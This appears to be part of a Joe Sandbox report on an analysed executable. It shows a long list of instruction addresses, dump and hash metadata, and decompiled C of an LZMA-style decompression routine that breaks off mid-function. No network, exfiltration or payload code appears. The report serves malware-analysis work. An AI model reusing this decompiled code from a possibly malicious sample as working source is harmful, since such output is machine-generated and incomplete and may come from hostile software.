                                                                                              0x00406d0e
                                                                                              0x00406d0e
                                                                                              0x00406d12
                                                                                              0x0040755d
                                                                                              0x00000000
                                                                                              0x0040755d
                                                                                              0x00406d1e
                                                                                              0x00406d29
                                                                                              0x00406d29
                                                                                              0x00406d29
                                                                                              0x00406d2c
                                                                                              0x00406d2f
                                                                                              0x00406d32
                                                                                              0x00406d37
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406d5f
                                                                                              0x00406d61
                                                                                              0x00406d64
                                                                                              0x00406dd5
                                                                                              0x00406dd8
                                                                                              0x00406ddb
                                                                                              0x00406de2
                                                                                              0x00406dec
                                                                                              0x00000000
                                                                                              0x00406dec
                                                                                              0x00406d66
                                                                                              0x00406d6a
                                                                                              0x00406d6d
                                                                                              0x00406d6f
                                                                                              0x00406d72
                                                                                              0x00406d75
                                                                                              0x00406d77
                                                                                              0x00406d7a
                                                                                              0x00406d7c
                                                                                              0x00406d81
                                                                                              0x00406d84
                                                                                              0x00406d87
                                                                                              0x00406d8b
                                                                                              0x00406d92
                                                                                              0x00406d95
                                                                                              0x00406d9c
                                                                                              0x00406da0
                                                                                              0x00406da8
                                                                                              0x00406da8
                                                                                              0x00406da8
                                                                                              0x00406da2
                                                                                              0x00406da2
                                                                                              0x00406da2
                                                                                              0x00406d97
                                                                                              0x00406d97
                                                                                              0x00406d97
                                                                                              0x00406dac
                                                                                              0x00406daf
                                                                                              0x00406dcd
                                                                                              0x00406dcf
                                                                                              0x00000000
                                                                                              0x00406db1
                                                                                              0x00406db1
                                                                                              0x00406db4
                                                                                              0x00406db7
                                                                                              0x00406dba
                                                                                              0x00406dbc
                                                                                              0x00406dbc
                                                                                              0x00406dbc
                                                                                              0x00406dbf
                                                                                              0x00406dc2
                                                                                              0x00406dc4
                                                                                              0x00406dc5
                                                                                              0x00406dc8
                                                                                              0x00000000
                                                                                              0x00406dc8
                                                                                              0x00000000
                                                                                              0x00406ffe
                                                                                              0x00407002
                                                                                              0x00407020
                                                                                              0x00407023
                                                                                              0x0040702a
                                                                                              0x0040702d
                                                                                              0x00407030
                                                                                              0x00407033
                                                                                              0x00407036
                                                                                              0x00407039
                                                                                              0x0040703b
                                                                                              0x00407042
                                                                                              0x00407043
                                                                                              0x00407045
                                                                                              0x00407048
                                                                                              0x0040704b
                                                                                              0x0040704e
                                                                                              0x0040704e
                                                                                              0x00407053
                                                                                              0x00000000
                                                                                              0x00407053
                                                                                              0x00407004
                                                                                              0x00407007
                                                                                              0x0040700a
                                                                                              0x00407014
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407068
                                                                                              0x0040706c
                                                                                              0x0040708f
                                                                                              0x00407092
                                                                                              0x00407095
                                                                                              0x0040709f
                                                                                              0x0040706e
                                                                                              0x0040706e
                                                                                              0x00407071
                                                                                              0x00407074
                                                                                              0x00407077
                                                                                              0x00407084
                                                                                              0x00407087
                                                                                              0x00407087
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040711c
                                                                                              0x00407120
                                                                                              0x00407127
                                                                                              0x0040712a
                                                                                              0x0040712d
                                                                                              0x00407137
                                                                                              0x00000000
                                                                                              0x00407137
                                                                                              0x00407122
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407143
                                                                                              0x00407147
                                                                                              0x0040714e
                                                                                              0x00407151
                                                                                              0x00407154
                                                                                              0x00407149
                                                                                              0x00407149
                                                                                              0x00407149
                                                                                              0x00407157
                                                                                              0x0040715a
                                                                                              0x0040715d
                                                                                              0x0040715d
                                                                                              0x00407160
                                                                                              0x00407163
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407203
                                                                                              0x00407203
                                                                                              0x00407207
                                                                                              0x004075a5
                                                                                              0x00000000
                                                                                              0x004075a5
                                                                                              0x0040720d
                                                                                              0x00407210
                                                                                              0x00407213
                                                                                              0x00407217
                                                                                              0x0040721a
                                                                                              0x00407220
                                                                                              0x00407222
                                                                                              0x00407222
                                                                                              0x00407222
                                                                                              0x00407225
                                                                                              0x00407228
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406df8
                                                                                              0x00406df8
                                                                                              0x00406dfc
                                                                                              0x00407569
                                                                                              0x00000000
                                                                                              0x00407569
                                                                                              0x00406e02
                                                                                              0x00406e05
                                                                                              0x00406e08
                                                                                              0x00406e0c
                                                                                              0x00406e0f
                                                                                              0x00406e15
                                                                                              0x00406e17
                                                                                              0x00406e17
                                                                                              0x00406e17
                                                                                              0x00406e1a
                                                                                              0x00406e1d
                                                                                              0x00406e1d
                                                                                              0x00406e20
                                                                                              0x00406e23
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406e29
                                                                                              0x00406e2f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406e35
                                                                                              0x00406e35
                                                                                              0x00406e39
                                                                                              0x00406e3c
                                                                                              0x00406e3f
                                                                                              0x00406e42
                                                                                              0x00406e45
                                                                                              0x00406e46
                                                                                              0x00406e49
                                                                                              0x00406e4b
                                                                                              0x00406e51
                                                                                              0x00406e54
                                                                                              0x00406e57
                                                                                              0x00406e5a
                                                                                              0x00406e5d
                                                                                              0x00406e60
                                                                                              0x00406e63
                                                                                              0x00406e7f
                                                                                              0x00406e82
                                                                                              0x00406e85
                                                                                              0x00406e88
                                                                                              0x00406e8f
                                                                                              0x00406e93
                                                                                              0x00406e95
                                                                                              0x00406e99
                                                                                              0x00406e65
                                                                                              0x00406e65
                                                                                              0x00406e69
                                                                                              0x00406e71
                                                                                              0x00406e76
                                                                                              0x00406e78
                                                                                              0x00406e7a
                                                                                              0x00406e7a
                                                                                              0x00406e9c
                                                                                              0x00406ea3
                                                                                              0x00406ea6
                                                                                              0x00000000
                                                                                              0x00406eac
                                                                                              0x00000000
                                                                                              0x00406eac
                                                                                              0x00000000
                                                                                              0x00406eb1
                                                                                              0x00406eb1
                                                                                              0x00406eb5
                                                                                              0x00407575
                                                                                              0x00000000
                                                                                              0x00407575
                                                                                              0x00406ebb
                                                                                              0x00406ebe
                                                                                              0x00406ec1
                                                                                              0x00406ec5
                                                                                              0x00406ec8
                                                                                              0x00406ece
                                                                                              0x00406ed0
                                                                                              0x00406ed0
                                                                                              0x00406ed0
                                                                                              0x00406ed3
                                                                                              0x00406ed6
                                                                                              0x00406ed6
                                                                                              0x00406ed6
                                                                                              0x00406edc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406ede
                                                                                              0x00406ee1
                                                                                              0x00406ee4
                                                                                              0x00406ee7
                                                                                              0x00406eea
                                                                                              0x00406eed
                                                                                              0x00406ef0
                                                                                              0x00406ef3
                                                                                              0x00406ef6
                                                                                              0x00406ef9
                                                                                              0x00406efc
                                                                                              0x00406f14
                                                                                              0x00406f17
                                                                                              0x00406f1a
                                                                                              0x00406f1d
                                                                                              0x00406f1d
                                                                                              0x00406f20
                                                                                              0x00406f24
                                                                                              0x00406f26
                                                                                              0x00406efe
                                                                                              0x00406efe
                                                                                              0x00406f06
                                                                                              0x00406f0b
                                                                                              0x00406f0d
                                                                                              0x00406f0f
                                                                                              0x00406f0f
                                                                                              0x00406f29
                                                                                              0x00406f30
                                                                                              0x00406f33
                                                                                              0x00000000
                                                                                              0x00406f35
                                                                                              0x00000000
                                                                                              0x00406f35
                                                                                              0x00406f33
                                                                                              0x00406f3a
                                                                                              0x00406f3a
                                                                                              0x00406f3a
                                                                                              0x00406f3a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406f75
                                                                                              0x00406f75
                                                                                              0x00406f79
                                                                                              0x00407581
                                                                                              0x00000000
                                                                                              0x00407581
                                                                                              0x00406f7f
                                                                                              0x00406f82
                                                                                              0x00406f85
                                                                                              0x00406f89
                                                                                              0x00406f8c
                                                                                              0x00406f92
                                                                                              0x00406f94
                                                                                              0x00406f94
                                                                                              0x00406f94
                                                                                              0x00406f97
                                                                                              0x00406f9a
                                                                                              0x00406f9a
                                                                                              0x00406fa0
                                                                                              0x00406f3e
                                                                                              0x00406f3e
                                                                                              0x00406f41
                                                                                              0x00000000
                                                                                              0x00406f41
                                                                                              0x00406fa2
                                                                                              0x00406fa2
                                                                                              0x00406fa5
                                                                                              0x00406fa8
                                                                                              0x00406fab
                                                                                              0x00406fae
                                                                                              0x00406fb1
                                                                                              0x00406fb4
                                                                                              0x00406fb7
                                                                                              0x00406fba
                                                                                              0x00406fbd
                                                                                              0x00406fc0
                                                                                              0x00406fd8
                                                                                              0x00406fdb
                                                                                              0x00406fde
                                                                                              0x00406fe1
                                                                                              0x00406fe1
                                                                                              0x00406fe4
                                                                                              0x00406fe8
                                                                                              0x00406fea
                                                                                              0x00406fc2
                                                                                              0x00406fc2
                                                                                              0x00406fca
                                                                                              0x00406fcf
                                                                                              0x00406fd1
                                                                                              0x00406fd3
                                                                                              0x00406fd3
                                                                                              0x00406fed
                                                                                              0x00406ff4
                                                                                              0x00406ff7
                                                                                              0x00000000
                                                                                              0x00406ff9
                                                                                              0x00000000
                                                                                              0x00406ff9
                                                                                              0x00000000
                                                                                              0x00407286
                                                                                              0x00407286
                                                                                              0x0040728a
                                                                                              0x004075b1
                                                                                              0x00000000
                                                                                              0x004075b1
                                                                                              0x00407290
                                                                                              0x00407293
                                                                                              0x00407296
                                                                                              0x0040729a
                                                                                              0x0040729d
                                                                                              0x004072a3
                                                                                              0x004072a5
                                                                                              0x004072a5
                                                                                              0x004072a5
                                                                                              0x004072a8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407395
                                                                                              0x00407399
                                                                                              0x004073bb
                                                                                              0x004073be
                                                                                              0x004073c8
                                                                                              0x00000000
                                                                                              0x004073c8
                                                                                              0x0040739b
                                                                                              0x0040739e
                                                                                              0x004073a2
                                                                                              0x004073a5
                                                                                              0x004073a5
                                                                                              0x004073a8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407452
                                                                                              0x00407456
                                                                                              0x00407474
                                                                                              0x00407474
                                                                                              0x00407474
                                                                                              0x0040747b
                                                                                              0x00407482
                                                                                              0x00407489
                                                                                              0x00407489
                                                                                              0x00000000
                                                                                              0x00407489
                                                                                              0x00407458
                                                                                              0x0040745b
                                                                                              0x0040745e
                                                                                              0x00407461
                                                                                              0x00407468
                                                                                              0x004073ac
                                                                                              0x004073ac
                                                                                              0x004073af
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407543
                                                                                              0x00407546
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040717d
                                                                                              0x0040717f
                                                                                              0x00407186
                                                                                              0x00407187
                                                                                              0x00407189
                                                                                              0x0040718c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407194
                                                                                              0x00407197
                                                                                              0x0040719a
                                                                                              0x0040719c
                                                                                              0x0040719e
                                                                                              0x0040719e
                                                                                              0x0040719f
                                                                                              0x004071a2
                                                                                              0x004071a9
                                                                                              0x004071ac
                                                                                              0x004071ba
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407490
                                                                                              0x00407490
                                                                                              0x00407493
                                                                                              0x0040749a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040749f
                                                                                              0x0040749f
                                                                                              0x004074a3
                                                                                              0x004075db
                                                                                              0x00000000
                                                                                              0x004075db
                                                                                              0x004074a9
                                                                                              0x004074ac
                                                                                              0x004074af
                                                                                              0x004074b3
                                                                                              0x004074b6
                                                                                              0x004074bc
                                                                                              0x004074be
                                                                                              0x004074be
                                                                                              0x004074be
                                                                                              0x004074c1
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c7
                                                                                              0x004074c7
                                                                                              0x004074cb
                                                                                              0x0040752b
                                                                                              0x0040752e
                                                                                              0x00407533
                                                                                              0x00407534
                                                                                              0x00407536
                                                                                              0x00407538
                                                                                              0x0040753b
                                                                                              0x00000000
                                                                                              0x0040753b
                                                                                              0x004074cd
                                                                                              0x004074d3
                                                                                              0x004074d6
                                                                                              0x004074d9
                                                                                              0x004074dc
                                                                                              0x004074df
                                                                                              0x004074e2
                                                                                              0x004074e5
                                                                                              0x004074e8
                                                                                              0x004074eb
                                                                                              0x004074ee
                                                                                              0x00407507
                                                                                              0x0040750a
                                                                                              0x0040750d
                                                                                              0x00407510
                                                                                              0x00407514
                                                                                              0x00407516
                                                                                              0x00407516
                                                                                              0x00407517
                                                                                              0x0040751a
                                                                                              0x004074f0
                                                                                              0x004074f0
                                                                                              0x004074f8
                                                                                              0x004074fd
                                                                                              0x004074ff
                                                                                              0x00407502
                                                                                              0x00407502
                                                                                              0x0040751d
                                                                                              0x00407524
                                                                                              0x00000000
                                                                                              0x00407526
                                                                                              0x00000000
                                                                                              0x00407526
                                                                                              0x00000000
                                                                                              0x004071c2
                                                                                              0x004071c5
                                                                                              0x004071fb
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732e
                                                                                              0x0040732e
                                                                                              0x00407331
                                                                                              0x00407333
                                                                                              0x004075bd
                                                                                              0x00000000
                                                                                              0x004075bd
                                                                                              0x00407339
                                                                                              0x0040733c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407342
                                                                                              0x00407346
                                                                                              0x00407349
                                                                                              0x00407349
                                                                                              0x00407349
                                                                                              0x00000000
                                                                                              0x00407349
                                                                                              0x004071c7
                                                                                              0x004071c9
                                                                                              0x004071cb
                                                                                              0x004071cd
                                                                                              0x004071d0
                                                                                              0x004071d1
                                                                                              0x004071d3
                                                                                              0x004071d5
                                                                                              0x004071d8
                                                                                              0x004071db
                                                                                              0x004071f1
                                                                                              0x004071f6
                                                                                              0x0040722e
                                                                                              0x0040722e
                                                                                              0x00407232
                                                                                              0x0040725e
                                                                                              0x00407260
                                                                                              0x00407267
                                                                                              0x0040726a
                                                                                              0x0040726d
                                                                                              0x0040726d
                                                                                              0x00407272
                                                                                              0x00407272
                                                                                              0x00407274
                                                                                              0x00407277
                                                                                              0x0040727e
                                                                                              0x00407281
                                                                                              0x004072ae
                                                                                              0x004072ae
                                                                                              0x004072b1
                                                                                              0x004072b4
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00000000
                                                                                              0x00407328
                                                                                              0x004072b6
                                                                                              0x004072bc
                                                                                              0x004072bf
                                                                                              0x004072c2
                                                                                              0x004072c5
                                                                                              0x004072c8
                                                                                              0x004072cb
                                                                                              0x004072ce
                                                                                              0x004072d1
                                                                                              0x004072d4
                                                                                              0x004072d7
                                                                                              0x004072f0
                                                                                              0x004072f2
                                                                                              0x004072f5
                                                                                              0x004072f6
                                                                                              0x004072f9
                                                                                              0x004072fb
                                                                                              0x004072fe
                                                                                              0x00407300
                                                                                              0x00407302
                                                                                              0x00407305
                                                                                              0x00407307
                                                                                              0x0040730a
                                                                                              0x0040730e
                                                                                              0x00407310
                                                                                              0x00407310
                                                                                              0x00407311
                                                                                              0x00407314
                                                                                              0x00407317
                                                                                              0x004072d9
                                                                                              0x004072d9
                                                                                              0x004072e1
                                                                                              0x004072e6
                                                                                              0x004072e8
                                                                                              0x004072eb
                                                                                              0x004072eb
                                                                                              0x0040731a
                                                                                              0x00407321
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00407321
                                                                                              0x00407234
                                                                                              0x00407237
                                                                                              0x00407239
                                                                                              0x0040723c
                                                                                              0x0040723f
                                                                                              0x00407242
                                                                                              0x00407244
                                                                                              0x00407247
                                                                                              0x0040724a
                                                                                              0x0040724a
                                                                                              0x0040724d
                                                                                              0x0040724d
                                                                                              0x00407250
                                                                                              0x00407257
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00407257
                                                                                              0x004071dd
                                                                                              0x004071e0
                                                                                              0x004071e2
                                                                                              0x004071e5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406f44
                                                                                              0x00406f44
                                                                                              0x00406f48
                                                                                              0x0040758d
                                                                                              0x00000000
                                                                                              0x0040758d
                                                                                              0x00406f4e
                                                                                              0x00406f51
                                                                                              0x00406f54
                                                                                              0x00406f57
                                                                                              0x00406f5a
                                                                                              0x00406f5d
                                                                                              0x00406f60
                                                                                              0x00406f62
                                                                                              0x00406f65
                                                                                              0x00406f68
                                                                                              0x00406f6b
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x00407350
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407356
                                                                                              0x00407359
                                                                                              0x0040735c
                                                                                              0x0040735f
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407364
                                                                                              0x00407367
                                                                                              0x0040736a
                                                                                              0x0040736d
                                                                                              0x00407370
                                                                                              0x00407373
                                                                                              0x00407374
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407379
                                                                                              0x0040737c
                                                                                              0x0040737f
                                                                                              0x00407382
                                                                                              0x00407385
                                                                                              0x00407389
                                                                                              0x0040738b
                                                                                              0x0040738e
                                                                                              0x00000000
                                                                                              0x00407390
                                                                                              0x00000000
                                                                                              0x00407390
                                                                                              0x0040738e
                                                                                              0x004075c3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406bf2

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                                                              • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                                                                                              • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                                                              • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406BB0 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 98%
                                                                                              			E00406BB0(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
